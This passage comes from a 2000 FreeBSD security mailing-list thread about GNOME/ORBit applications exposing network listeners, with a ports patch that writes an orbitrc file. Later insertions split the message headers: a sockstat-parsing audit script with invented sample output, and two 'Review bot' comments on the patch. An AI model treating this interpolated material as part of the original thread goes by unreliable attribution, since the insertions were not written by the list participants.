iQCVAwUBOb/kDlUuHi5z0oilAQGvbAQAihAdHJMSq1ZyN71EzJ0FpBmzdgDYEIJ2
keMI1mMfgTgH3gxGnQ9POji6vdw+FxuB2QQuNJvvc8xAsbTLxq18kfeLjlRglc9+
rc23bwT83N5PVdQwJEMyvWugghxvT/3MYhnO3djNnpdep8jPmkAinjJWvVFcb50y
kRwD3IJtjUc=
=U45z
-----END PGP SIGNATURE-----

From owner-freebsd-security Wed Sep 13 19:43:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from whizzo.transsys.com (whizzo.TransSys.COM [144.202.42.10]) by hub.freebsd.org (Postfix) with ESMTP id D3A3937B424; Wed, 13 Sep 2000 
19:43:13 -0700 (PDT) Received: from whizzo.transsys.com (localhost.transsys.com [127.0.0.1]) by whizzo.transsys.com (8.11.0/8.11.0) with ESMTP id e8E2hDG42233; Wed, 13 Sep 2000 22:43:13 -0400 (EDT) (envelope-from louie@whizzo.transsys.com) Message-Id: <200009140243.e8E2hDG42233@whizzo.transsys.com> X-Mailer: exmh version 2.1.1 10/15/1999 X-Image-URL: http://www.transsys.com/louie/images/louie-mail.jpg To: security@freebsd.org, ade@freebsd.org 
From: "Louis A. Mamakos"
Subject: potential security exposure in GNOME/ORBit?
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 13 Sep 2000 22:43:13 -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I did a quick search of the FreeBSD security mailing list archives, but didn't see a discussion of this. My apologies if this ground has been covered.

I recently installed GNOME on my FreeBSD-current boxes, and noted that a bunch of GNOME applications were listening on random TCP ports. Some investigation eventually revealed that this is intended to be used as a rendezvous mechanism for the ORBit CORBA implementation.

Now, this seemed like a strange default configuration, as the usual mode of these interactions on the same machine would appear to be UNIX domain sockets created for this purpose. Some discussion on one of the GNOME mailing list archives spoke to this; the arguments were one of either:

1. By default, a system out of the box shouldn't be listening on random ports in a way which makes it difficult to secure, or even necessary to have to secure.

or

2. Hey, it's not a bug, but a *feature* of ORBit that the CORBA thing work transparently and easily over the network, and not just on the local machine. You can't just "fix" this for GNOME applications without "breaking" other applications that might use ORBit between machines.

The solution offered was that folks concerned about these ORBit based applications waiting for connections could put

    ORBIIOPIPv4=0
    ORBIIOPIPv6=0

into /usr/local/etc/orbitrc to disable this behavior. I've done this, and the GNOME applications using ORBit continue to work, presumably continuing to use the UNIX domain sockets created for the purpose.

So my question is related to what the default state should be when someone installs the FreeBSD GNOME ports?

In my own case, I found it surprising to find a bunch of processes (which probably haven't been well audited for security issues) listening on random ports, just waiting for a port scan. As nothing else is using ORBit than these local GNOME applications, I did the "fix" above and no more ports waiting for connections from who knows where.

I'd suggest that minimally there be a warning, or perhaps that the orbitrc file be installed to turn off this "feature" when the devel/ORBit port is installed.

louie

From owner-freebsd-security Wed Sep 13 22:05:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id ABE5B37B43C; Wed, 13 Sep 2000 22:05:40 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id WAA52292; Wed, 13 Sep 2000 22:05:40 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 13 Sep 2000 22:05:40 -0700 (PDT)
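The listeners Louie describes are exactly what sockstat(1) shows on FreeBSD. The script below is an added example, not code from this thread or from the GNOME/ORBit ports: it parses sockstat-style output and flags every socket bound to the wildcard address on an unprivileged port, which is the reachable-from-the-network set the orbitrc change is meant to empty. The sockstat output it runs on is constructed for the example; the process names, PIDs and port numbers are invented.

```shell
#!/bin/sh
# Added example, not part of the original thread or of the ORBit/GNOME ports:
# flag processes listening on unprivileged TCP ports on a wildcard address,
# from sockstat(1)-style output.
#
# Input format is that of `sockstat -4 -6 -l` on FreeBSD:
#   USER COMMAND PID FD PROTO LOCAL_ADDRESS FOREIGN_ADDRESS
# The sample below is constructed for this example; the process names,
# PIDs and port numbers are invented, not captured from a real host.
SAMPLE_SOCKSTAT='USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     sshd       211   3  tcp4   *:22                  *:*
root     sendmail   245   4  tcp4   127.0.0.1:25          *:*
louie    panel      1043  7  tcp4   *:33012               *:*
louie    gnome-term 1051  5  tcp4   *:34117               *:*
louie    gnome-term 1051  6  tcp6   *:34117               *:*
louie    xterm      1060  8  tcp4   127.0.0.1:6010        *:*'

# flag_unprivileged_listeners [MIN_PORT]
#   Reads sockstat-style lines on stdin and prints "user command pid proto port"
#   for every socket bound to the wildcard address (*) on a port >= MIN_PORT
#   (default 1024).  Loopback-only listeners are skipped: they are not
#   reachable from the network, which is what the orbitrc setting is about.
flag_unprivileged_listeners() {
    min_port=${1:-1024}
    awk -v min="$min_port" '
        NR == 1 { next }                        # header line
        {
            addr = $6
            port = addr; sub(/.*:/, "", port)     # text after the last colon
            host = addr; sub(/:[^:]*$/, "", host) # everything before it (v6 safe)
            if (host == "*" && port + 0 >= min)
                print $1, $2, $3, $5, port
        }'
}

# count_flagged [MIN_PORT] -> number of flagged sockets in the constructed sample
count_flagged() {
    printf '%s\n' "$SAMPLE_SOCKSTAT" | flag_unprivileged_listeners "$@" | wc -l | tr -d ' '
}

# Stand-alone run: report what the constructed sample would produce.
printf '%s\n' "$SAMPLE_SOCKSTAT" | flag_unprivileged_listeners
```

On a real host the same filter runs as `sockstat -4 -6 -l | flag_unprivileged_listeners`; sshd on port 22 and the loopback-only sendmail and X forwarding sockets drop out, and what remains is the list of processes Louie would have wanted to see before and after writing the orbitrc file.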
From: Kris Kennaway
To: "Louis A. Mamakos"
Cc: security@freebsd.org, ade@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
In-Reply-To: <200009140243.e8E2hDG42233@whizzo.transsys.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 13 Sep 2000, Louis A. Mamakos wrote:

> I'd suggest that minimally there be a warning, or perhaps that the
> orbitrc file be installed to turn off this "feature" when the
> devel/ORBit port is installed.

Unless anyone can think of compelling reasons to have network listening enabled, I'd prefer to have it disabled by default.

GNOME scares me :-)

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Wed Sep 13 22:39:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from pilikia.net (pilikia.net [12.36.98.183]) by hub.freebsd.org (Postfix) with ESMTP id 8EAE037B423 for ; Wed, 13 Sep 2000 22:39:53 -0700 (PDT) Received: from gecko (gecko [192.168.0.3]) by pilikia.net (8.9.3/8.9.3) with ESMTP id TAA56989 for ; Wed, 13 Sep 2000 19:39:51 -1000 (HST) (envelope-from art@pilikia.net) Message-ID: <200009131939520530.0C9623EE@pilikia.net> X-Mailer: Calypso Version 3.10.03.02 (3) Date: Wed, 13 Sep 2000 19:39:52 -1000 Reply-To: art@pilikia.net
From: "Arthur W. Neilson III" To: security@freebsd.org Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org subscribe art@pilikia.net -- __ / ) _/_ It is a capital mistake to theorise before one has data. /--/ __ / Insensibly one begins to twist facts to suit theories, / (_/ (_<__ Instead of theories to suit facts. -- Sherlock Holmes, "A Scandal in Bohemia" Arthur W. Neilson III, WH7N - FISTS #7448 Bank of Hawaii Tech Support http://www.pilikia.net art@pilikia.net, aneilson@boh.com, wh7n@arrl.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 4:50:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from pawn.primelocation.net (pawn.primelocation.net [205.161.238.235]) by hub.freebsd.org (Postfix) with ESMTP id 619A337B423; Thu, 14 Sep 2000 04:50:09 -0700 (PDT) Received: from earth.causticlabs.com (unknown [207.192.76.213]) by pawn.primelocation.net (Postfix) with ESMTP id EC4B59B05; Thu, 14 Sep 2000 07:50:06 -0400 (EDT) Date: Thu, 14 Sep 2000 07:50:05 -0400 (EDT) 
From: "Chris D. Faulhaber"
X-Sender: jedgar@earth.causticlabs.com
To: Kris Kennaway
Cc: "Louis A. Mamakos" , security@freebsd.org, ade@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 13 Sep 2000, Kris Kennaway wrote:

> On Wed, 13 Sep 2000, Louis A. Mamakos wrote:
>
> > I'd suggest that minimally there be a warning, or perhaps that the
> > orbitrc file be installed to turn off this "feature" when the
> > devel/ORBit port is installed.
>
> Unless anyone can think of compelling reasons to have network listening
> enabled, I'd prefer to have it disabled by default.
>
> GNOME scares me :-)
>

I agree...it gives me the willies too :)

-----
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Thu Sep 14 6:56:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 4A01437B43C; Thu, 14 Sep 2000 06:56:21 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZZUy-000Izx-00; Thu, 14 Sep 2000 08:56:20 -0500 Date: Thu, 14 Sep 2000 08:56:20 -0500
From: Ade Lovett
To: Kris Kennaway
Cc: "Louis A. Mamakos" , security@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
Message-ID: <20000914085620.K61662@FreeBSD.org>
References: <200009140243.e8E2hDG42233@whizzo.transsys.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from kris@FreeBSD.org on Wed, Sep 13, 2000 at 10:05:40PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Sep 13, 2000 at 10:05:40PM -0700, Kris Kennaway wrote:
> Unless anyone can think of compelling reasons to have network listening
> enabled, I'd prefer to have it disabled by default.

I'll kill it off later on this week. Since I have an awful lot of GNOME applications running on this box (some from ports, some just waiting to be ported), I should be able to pick up on any other problems fairly quickly.

I also have a tentative fix for the locale problem that was highlighted elsewhere (on -stable I believe).

> GNOME scares me :-)

Me too. Does that scare you any more? :)

-aDe
[Mr FreeBSD GNOME]

--
Ade Lovett, Austin, TX. ade@FreeBSD.org
FreeBSD: The Power to Serve http://www.FreeBSD.org/

From owner-freebsd-security Thu Sep 14 8:14:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id BAA6637B50D; Thu, 14 Sep 2000 08:14:19 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZaiP-000J6E-00; Thu, 14 Sep 2000 10:14:17 -0500 Date: Thu, 14 Sep 2000 10:14:17 -0500
From: Ade Lovett To: Kris Kennaway Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? Message-ID: <20000914101417.A73358@FreeBSD.org> References: <200009140243.e8E2hDG42233@whizzo.transsys.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="HlL+5n6rz5pIUxbD" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from kris@FreeBSD.org on Wed, Sep 13, 2000 at 10:05:40PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Wed, Sep 13, 2000 at 10:05:40PM -0700, Kris Kennaway wrote: > Unless anyone can think of compelling reasons to have network listening > enabled, I'd prefer to have it disabled by default. Please review the following patch.. I'll commit later today unless I hear screams of anguish otherwise (note that there is no etc/orbitrc installed by default, hence the initial overwriting). -aDe -- Ade Lovett, Austin, TX. ade@FreeBSD.org FreeBSD: The Power to Serve http://www.FreeBSD.org/ --HlL+5n6rz5pIUxbD Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="orbit.patch" Index: Makefile =================================================================== RCS file: /home/src/FreeBSD/ports/devel/ORBit/Makefile,v retrieving revision 1.34 diff -u -r1.34 Makefile --- Makefile 2000/08/04 01:15:44 1.34 +++ Makefile 2000/09/14 15:02:59 @@ -7,6 +7,7 @@ PORTNAME= ORBit PORTVERSION= 0.5.3 +PORTREVISION= 1 CATEGORIES= devel gnome MASTER_SITES= ${MASTER_SITE_GNOME} MASTER_SITE_SUBDIR= stable/sources/ORBit 
@@ -27,5 +28,9 @@ LDFLAGS="-L${LOCALBASE}/lib" CONFIGURE_ARGS= --disable-indent + +post-install: + @${ECHO} "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc + @${ECHO} "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc .include Index: pkg/PLIST =================================================================== RCS file: /home/src/FreeBSD/ports/devel/ORBit/pkg/PLIST,v retrieving revision 1.10 diff -u -r1.10 PLIST --- pkg/PLIST 2000/06/15 17:12:26 1.10 +++ pkg/PLIST 2000/09/14 15:13:58 @@ -7,6 +7,7 @@ bin/orbit-ird bin/orbit-name-server etc/libIDLConf.sh +etc/orbitrc include/IIOP/IIOP-config.h include/IIOP/IIOP-types.h include/IIOP/IIOP.h --HlL+5n6rz5pIUxbD-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 8:16:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from almen.vxu.se (almen.vxu.se [194.47.99.100]) by hub.freebsd.org (Postfix) with ESMTP id 4657A37B423 for ; Thu, 14 Sep 2000 08:16:12 -0700 (PDT) Received: from XGod (aaldv97.idet.vxu.se [194.47.111.20]) by almen.vxu.se (8.8.8/8.8.7) with SMTP id RAA27017 for ; Thu, 14 Sep 2000 17:16:10 +0200 (MET DST) Message-ID: <003901c01e5e$c1cd4bf0$6400a8c0@XGod> 
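Review bot: in the post-install hunk, the first line `@${ECHO} "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc` truncates whatever ${PREFIX}/etc/orbitrc already contains, so every reinstall or upgrade of the port silently discards an administrator's local settings, and since this same patch bumps PORTREVISION every existing user will go through exactly that upgrade. Guard the write with an existence test, for example `[ -f ${PREFIX}/etc/orbitrc ] || { ...; }`, or install the two lines as etc/orbitrc.sample and copy it into place only when no orbitrc exists. Switching both lines to `>>` is not a fix on its own: an existing `ORBIIOPIPv4=1` would then sit next to an appended `ORBIIOPIPv4=0`, with the effective value depending on how ORBit resolves the duplicate.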
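Review bot: in the pkg/PLIST hunk, registering etc/orbitrc as a package file turns an administrator's configuration into package-owned data: pkg_delete removes it unconditionally, local edits included, and a package built from this port ships whatever the post-install target generated rather than a file the port installs. The usual ports idiom is to list etc/orbitrc.sample in the PLIST, remove the live file on deinstall only when it still matches the sample (`@unexec if cmp -s %D/etc/orbitrc.sample %D/etc/orbitrc; then rm -f %D/etc/orbitrc; fi`), and copy the sample into place on install only when no orbitrc exists.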
From: "David Andreas Alderud"
To:
References: <200009140243.e8E2hDG42233@whizzo.transsys.com> <20000914085620.K61662@FreeBSD.org>
Subject: Re: potential security exposure in GNOME/ORBit?
Date: Thu, 14 Sep 2000 17:16:29 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Ade Lovett wrote:
> > GNOME scares me :-)
>
> Me too. Does that scare you any more? :)

It ought to scare anyone. Using a non-centralized development model for so much code is like asking for trouble when it comes to bugs and security. Besides, anything that uses resources like there were no end to them doesn't belong in a UNIX-like environment, or anywhere for that matter.

/Kind regards, David A. Alderud

From owner-freebsd-security Thu Sep 14 10:04:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8F50E37B424; Thu, 14 Sep 2000 10:04:51 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id KAA61241; Thu, 14 Sep 2000 10:04:51 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 14 Sep 2000 10:04:51 -0700 (PDT)
From: Kris Kennaway To: Ade Lovett Cc: "Louis A. Mamakos" , security@freebsd.org Subject: Re: potential security exposure in GNOME/ORBit? In-Reply-To: <20000914101417.A73358@FreeBSD.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 14 Sep 2000, Ade Lovett wrote: > Please review the following patch.. I'll commit later today unless > I hear screams of anguish otherwise (note that there is no etc/orbitrc > installed by default, hence the initial overwriting). + +post-install: + @${ECHO} "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc + @${ECHO} "ORBIIOPIPv6=0" >> ${PREFIX}/etc/orbitrc Hmm. Doing it this way will spam any local configuration changes someone may make after installation when they upgrade to a new version..are there any other settings it is likely people may want to set in the orbitrc file? What may be better is to make those settings the default policy, and then install an orbitrc.sample showing how to override them and only remove that file, not orbitrc. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 14 10: 9:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id BA9BC37B423; Thu, 14 Sep 2000 10:09:54 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZcWD-000JMs-00; Thu, 14 Sep 2000 12:09:49 -0500 Date: Thu, 14 Sep 2000 12:09:49 -0500 
From: Ade Lovett
To: Kris Kennaway
Cc: "Louis A. Mamakos" , security@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
Message-ID: <20000914120949.E73990@FreeBSD.org>
References: <20000914101417.A73358@FreeBSD.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from kris@FreeBSD.org on Thu, Sep 14, 2000 at 10:04:51AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 14, 2000 at 10:04:51AM -0700, Kris Kennaway wrote:
> Hmm. Doing it this way will spam any local configuration changes someone
> may make after installation when they upgrade to a new version..are there
> any other settings it is likely people may want to set in the orbitrc
> file?

Well, I have practically every GNOME port installed on my crashbox, and at no time has anything ever been put in etc/orbitrc

> What may be better is to make those settings the default policy, and then
> install an orbitrc.sample showing how to override them and only remove
> that file, not orbitrc.

So you'd be happy with installing an orbitrc.sample, followed by a pkg/MESSAGE printout telling them to merge it with any existing orbitrc they might have, otherwise their box could be insecure?

-aDe

--
Ade Lovett, Austin, TX. ade@FreeBSD.org
FreeBSD: The Power to Serve http://www.FreeBSD.org/

From owner-freebsd-security Thu Sep 14 10:14:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9048A37B424; Thu, 14 Sep 2000 10:14:31 -0700 (PDT) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id KAA64563; Thu, 14 Sep 2000 10:14:31 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 14 Sep 2000 10:14:31 -0700 (PDT)
From: Kris Kennaway
To: Ade Lovett
Cc: "Louis A. Mamakos" , security@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
In-Reply-To: <20000914120949.E73990@FreeBSD.org>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 14 Sep 2000, Ade Lovett wrote:

> > What may be better is to make those settings the default policy, and then
> > install an orbitrc.sample showing how to override them and only remove
> > that file, not orbitrc.
>
> So you'd be happy with installing an orbitrc.sample, followed by
> a pkg/MESSAGE printout telling them to merge it with any existing
> orbitrc they might have, otherwise their box could be insecure?

No, I'd like the binary itself to default to not listening on the network with a way to enable it, and install the sample file telling them how to enable it if they need to. That way the default security isn't compromised and we don't spam anyone who may have local changes in their orbitrc.

Kris

--
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Thu Sep 14 10:23:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 350E937B424; Thu, 14 Sep 2000 10:23:21 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZcjI-000JOm-00; Thu, 14 Sep 2000 12:23:20 -0500 Date: Thu, 14 Sep 2000 12:23:20 -0500
From: Ade Lovett
To: Kris Kennaway
Cc: "Louis A. Mamakos" , security@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
Message-ID: <20000914122320.G73990@FreeBSD.org>
References: <20000914120949.E73990@FreeBSD.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from kris@FreeBSD.org on Thu, Sep 14, 2000 at 10:14:31AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 14, 2000 at 10:14:31AM -0700, Kris Kennaway wrote:
> No, I'd like the binary itself to default to not listening on the network
> with a way to enable it, and install the sample file telling them how to
> enable it if they need to. That way the default security isn't compromised
> and we don't spam anyone who may have local changes in their orbitrc.

The problem here is that it's not the binary itself that is configured to listen on the network (indeed, the defaults for ipv4 and ipv6 are 0 in the ORBit code itself). The issue is how ORBit is linked to/run by other applications, which may or may not turn on ipv4/ipv6 sockets, with etc/orbitrc and ~/.orbitrc being used for overrides.

So, short of looking at every single port that we have that uses ORBit directly, and making appropriate modifications, I can't see how this can be done without potentially hacking a lot of ports, and also auditing new ones as they come in.

-aDe

--
Ade Lovett, Austin, TX. ade@FreeBSD.org
FreeBSD: The Power to Serve http://www.FreeBSD.org/

From owner-freebsd-security Thu Sep 14 13:00:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7755937B423; Thu, 14 Sep 2000 13:00:20 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id OAA71536; Thu, 14 Sep 2000 14:00:15 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id NAA98659; Thu, 14 Sep 2000 13:59:42 -0600 (MDT)
Message-Id: <200009141959.NAA98659@harmony.village.org>
To: Kris Kennaway
Subject: Re: potential security exposure in GNOME/ORBit?
Cc: "Louis A. Mamakos" , security@FreeBSD.ORG, ade@FreeBSD.ORG
In-reply-to: Your message of "Wed, 13 Sep 2000 22:05:40 PDT."
References:
Date: Thu, 14 Sep 2000 13:59:42 -0600
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Kris Kennaway writes:
: GNOME scares me :-)

You should take Theo de Raadt out, ply him with beer and then get him started on this topic. The results aren't pretty.

Warner

From owner-freebsd-security Thu Sep 14 13:09:03 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 7CABF37B43E for ; Thu, 14 Sep 2000 13:08:58 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZfJ8-000JiU-00; Thu, 14 Sep 2000 15:08:30 -0500 Date: Thu, 14 Sep 2000 15:08:30 -0500
From: Ade Lovett
To: Warner Losh
Cc: security@FreeBSD.ORG
Subject: Re: potential security exposure in GNOME/ORBit?
Message-ID: <20000914150830.E74753@FreeBSD.org>
References: <200009141959.NAA98659@harmony.village.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200009141959.NAA98659@harmony.village.org>; from imp@village.org on Thu, Sep 14, 2000 at 01:59:42PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 14, 2000 at 01:59:42PM -0600, Warner Losh wrote:
> You should take Theo de Raadt out

Now there's an interesting idea.. oh.. wait.. maybe it's not that kind of "take-out"..

> The results aren't pretty.

From the beer, or the taking-out? Both could be equally messy.

-aDe

--
Ade Lovett, Austin, TX. ade@FreeBSD.org
FreeBSD: The Power to Serve http://www.FreeBSD.org/

From owner-freebsd-security Thu Sep 14 14:56:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from hub.lovett.com (hub.lovett.com [216.60.121.161]) by hub.freebsd.org (Postfix) with ESMTP id 39C4537B423; Thu, 14 Sep 2000 14:56:16 -0700 (PDT) Received: from ade by hub.lovett.com with local (Exim 3.16 #1) id 13ZgzN-000JwE-00; Thu, 14 Sep 2000 16:56:13 -0500 Date: Thu, 14 Sep 2000 16:56:13 -0500
From: Ade Lovett
To: Kris Kennaway
Cc: security@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
Message-ID: <20000914165613.J74753@lovett.com>
References: <20000914120949.E73990@FreeBSD.org> <20000914122320.G73990@FreeBSD.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20000914122320.G73990@FreeBSD.org>; from ade@FreeBSD.org on Thu, Sep 14, 2000 at 12:23:20PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 14, 2000 at 12:23:20PM -0500, Ade Lovett wrote:
> So, short of looking at every single port that we have that uses
> ORBit directly, and making appropriate modifications, I can't see
> how this can be done without potentially hacking a lot of ports,
> and also auditing new ones as they come in.

Unless I hear to the contrary (ie: someone comes up with a better solution + patches) by 0900 CDT tomorrow 9/15, I'm going to commit my original patch, modulo that it will install etc/orbitrc.sample and use a pkg/MESSAGE suggesting that they move it in place for security reasons.

There is obviously a security issue here, and it behooves us to at least put in the quick-fix, even if it is backed out and replaced with "the right way" at some later date, perhaps in a newer version.

One thing that would be useful is for interested parties to bring up a suite of ORBit applications that are listening on these high-numbered ports, and then hunt for an exploit. If we can get that, we're already covered (by the quick-hack) and it'll provide a kick in the pants for a proper fix from the people that understand the code the best -- the authors (I hope :)

-aDe

--
Ade Lovett, Austin, TX. ade@FreeBSD.org
FreeBSD: The Power to Serve http://www.FreeBSD.org/

From owner-freebsd-security Thu Sep 14 17:13:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4891F37B42C; Thu, 14 Sep 2000 17:13:31 -0700 (PDT) Received: by gw.nectar.com (Postfix, from userid 1001) id 389111925D; Thu, 14 Sep 2000 19:13:30 -0500 (CDT) Date: Thu, 14 Sep 2000 19:13:30 -0500
From: "Jacques A. Vidrine"
To: Ade Lovett
Cc: security@freebsd.org
Subject: Re: potential security exposure in GNOME/ORBit?
Message-ID: <20000914191330.A817@spawn.nectar.com>
References: <20000914120949.E73990@FreeBSD.org> <20000914122320.G73990@FreeBSD.org> <20000914165613.J74753@lovett.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <20000914165613.J74753@lovett.com>; from ade@FreeBSD.org on Thu, Sep 14, 2000 at 04:56:13PM -0500
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 14, 2000 at 04:56:13PM -0500, Ade Lovett wrote:
> Unless I hear to the contrary (ie: someone comes up with a better
> solution + patches) by 0900 CDT tomorrow 9/15, I'm going to commit my
> original patch, modulo that it will install etc/orbitrc.sample and
> use a pkg/MESSAGE suggesting that they move it in place for security
> reasons.

In that case, why bother with an etc/orbitrc.sample? Just have the appropriate message in pkg/MESSAGE.

However, I think that is mostly useless. I'd rather see this:

    # only create orbitrc when there is no existing one to preserve
    if [ ! -f ${PREFIX}/etc/orbitrc ]; then
        echo "ORBIIOPIPv4=0" > ${PREFIX}/etc/orbitrc
